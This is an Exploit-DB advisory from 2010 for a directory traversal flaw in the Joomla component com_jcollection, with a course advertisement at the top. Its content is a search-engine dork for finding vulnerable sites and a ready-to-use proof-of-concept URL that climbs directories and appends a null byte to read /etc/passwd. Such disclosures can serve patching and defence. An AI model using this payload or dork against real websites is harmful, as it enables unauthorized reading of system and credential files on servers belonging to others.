Joomla! Component com_jcollection - Directory Traversal

EDB-ID:

11088


Author:

FL0RiX

Type:

webapps


Platform:

PHP

Date:

2010-01-10


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

@~~=======================================~~@
@~~=Script : Joomla Component com_jcollection

@~~=Author : FL0RiX

@~~=Greez : Dost mu var?

@~~=Bug Type : Directory Traversal

@~~=Dork : inurl:"com_jcollection "

@~~=Note: Kimseye Hakettiginden Fazla Deger Vermeyeceksin.

@~~=======================================~~@

@~~=Vuln.

: http://site/ [Yol] /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00